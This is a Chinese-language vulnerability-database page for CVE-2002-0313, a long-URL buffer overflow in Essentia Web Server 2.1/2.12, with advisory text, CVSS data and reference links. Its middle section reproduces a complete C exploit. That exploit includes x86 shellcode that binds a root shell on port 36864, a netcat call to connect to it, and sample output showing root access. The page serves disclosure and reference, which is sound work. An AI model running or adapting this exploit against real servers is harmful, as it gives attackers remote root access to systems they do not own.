CVE-2002-0313
CVSS7.5
发布时间 :2002-06-25 00:00:00
修订时间 :2016-10-17 22:18:56
NMCOES    

[原文]Buffer overflow in Essentia Web Server 2.1 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long URL.


[CNNVD]Essentia Web Server超长URL缓冲区溢出漏洞(CNNVD-200206-068)

        Essentia Web Server 2.1版本存在缓冲区溢出漏洞。远程攻击者借助超长URL导致服务拒绝且可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0313
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0313
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-068
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006231.html
(UNKNOWN)  FULLDISC  20030704 Essentia Web Server 2.12 (Linux)
http://marc.info/?l=bugtraq&m=101440530023617&w=2
(UNKNOWN)  BUGTRAQ  20020221 SecurityOffice Security Advisory:// Essentia Web Server DoS Vulnerability
http://online.securityfocus.com/archive/1/258365
(VENDOR_ADVISORY)  BUGTRAQ  20020226 SecurityOffice Security Advisory:// Essentia Web Server Vulnerabilities (Vendor Patch)
http://www.iss.net/security_center/static/8249.php
(VENDOR_ADVISORY)  XF  essentia-server-long-request-dos(8249)
http://www.securityfocus.com/bid/4159
(VENDOR_ADVISORY)  BID  4159

- 漏洞信息

Essentia Web Server超长URL缓冲区溢出漏洞
高危 缓冲区溢出
2002-06-25 00:00:00 2005-05-13 00:00:00
远程  
        Essentia Web Server 2.1版本存在缓冲区溢出漏洞。远程攻击者借助超长URL导致服务拒绝且可能执行任意代码。

- 公告与补丁

        The vendor has released an update.
        Essen Essentia Web Server 2.1
        

- 漏洞信息 (21298)

Essentia Web Server 2.1 Long URL Buffer Overflow Vulnerability (EDBID:21298)
windows remote
2003-07-04 Verified
0 B-r00t
N/A [点击下载]
source: http://www.securityfocus.com/bid/4159/info

Essentia Web Server is a multi-threaded HTTP server designed for Microsoft Windows and Linux environments. Essentia is maintained by Essen.

Essentia is prone to a remote denial of service. This condition may be triggered by submitting an excessively long URL (2000+ bytes). Successful exploitation will deny service to legitimate users and will require that the webserver be restarted to regain normal functionality.

This problem is due to a lack of bounds-checking on the length of URLs. Because of this, an attacker may also be able to exploit this condition to execute arbitrary code.

This issue was reported for Essentia Web Sever v2.1; earlier versions may also be affected. 

/*

	Title:		Remote Buffer Overflow in Essentia Webserver.
	Author:		By B-r00t <br00t@blueyonder.co.uk>

	Date:		04/07/2003
	Reference:	http://www.essencomp.com/
	Versions:	Essentia Web Server 2.12 (Linux) => VULNERABLE
	Related Info:	http://www.securityfocus.com/bid/4159/info/

	Exploit:	essenexploit.c
	Compile:	gcc -o essenexploit essenexploit.c
			Exploit binds a r00tshell to port 36864.
			Tested on Redhat 7.2 & 7.1
			THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!



$ telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Jul 2003 11:19:39 GMT
Server: Essentia Web Server 2.12 (Linux)
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 757
ETag: "f104b5-5f2-0b7940f3"
Last-Modified: Thu, 03 Jul 2003 20:53:04 GMT

Connection closed by foreign host.



$ ./essenexploit 127.0.0.1
essenexploit by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Number of bytes sent: 2057 / 2057

Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
localhost.localdomain [127.0.0.1] 36864 (?) open
uname -a; id;
Linux RedHat7-2 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



ENJOY!
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "essenexploit"
#define DEST_PORT 80
#define NOP "A"

int main ( int argc, char *argv[] )
{

// Vars 
int socketfd, loop, bytes;
struct sockaddr_in dest_addr;
char *TARGET = "TARGET";
char buf[2100], *ptr;
// Big fat slide NOP so ret should be good everywhere!
char ret[] = "\xe8\xc5\xff\xbe\xe8\xc5\xff\xbe";
char shellcode[] =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);

if (argc < 2) 
{
        printf ("\nUsage: %s [IP_ADDRESS]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 \n", EXPLOIT);
        printf ("\nOn success a r00tshell will be spawned on port 36864.\n\n");
        exit (-1);
}

setenv (TARGET, argv[1], 1);

// Build buf
memset (buf, '\0', sizeof (buf));
ptr = buf;
strcat (buf, "GET /");

for (loop = 1; loop < 2033-sizeof(shellcode); loop++) 
strcat (buf, NOP);

strcat (buf, shellcode);
strcat (buf, ret);
strcat (buf, " HTTP/1.0");
strcat (buf, "\x0D\x0A\x0D\x0A");

// Socket
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("\nsocket error\n");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);

if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("\nconnect failed\n");
        close (socketfd);
        exit (3);
        }

// Wallop!
bytes = (send (socketfd, ptr, strlen(buf), 0));
if (bytes == -1) {
        perror("\nsend error\n");
        close (socketfd);
        exit(4);
        }
close (socketfd);
if (bytes < strlen(buf))
printf ("\nNetwork Error - Full Payload Was NOT sent!");

printf ("\n\nNumber of bytes sent: %d / %d\n", bytes, strlen(buf));
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ...!\n");
sleep (3);
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
} // end main

/*

Shoutz: Marshal-l, Rux0r, blunt, macavity, Monkfish
	Rewd, Maz. That One Doris ... U-Know-Who-U-R!
	The doris.scriptkiddie.net posse.

Author:	B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> (c)
	"If You Can't B-r00t Then Just B#."

	ENJOY! 
*/ 



		

- 漏洞信息

12309
Essentia Web Server Long URL Request Parsing Overflow DoS
Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2002-02-22 Unknow
2002-02-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Essentia Web Server Long URL Buffer Overflow Vulnerability
Boundary Condition Error 4159
Yes No
2002-02-22 12:00:00 2007-02-20 09:46:00
This vulnerability was submitted to BugTraq on February 22nd, 2002 by "Tamer Sahin" <ts@securityoffice.net>.

- 受影响的程序版本

Essen Essentia Web Server 2.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- 漏洞讨论

Essentia Web Server is a multi-threaded HTTP server designed for Microsoft Windows and Linux environments. Essentia is maintained by Essen.

Essentia is prone to a remote denial of service. This condition may be triggered by submitting an excessively long URL (2000+ bytes). Successful exploitation will deny service to legitimate users and will require that the webserver be restarted to regain normal functionality.

This problem is due to a lack of bounds-checking on the length of URLs. Because of this, an attacker may also be able to exploit this condition to execute arbitrary code.

This issue was reported for Essentia Web Sever v2.1; earlier versions may also be affected.

- 漏洞利用

An exploit has been made available by B-r00t:

- 解决方案

The vendor has released an update.


Essen Essentia Web Server 2.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站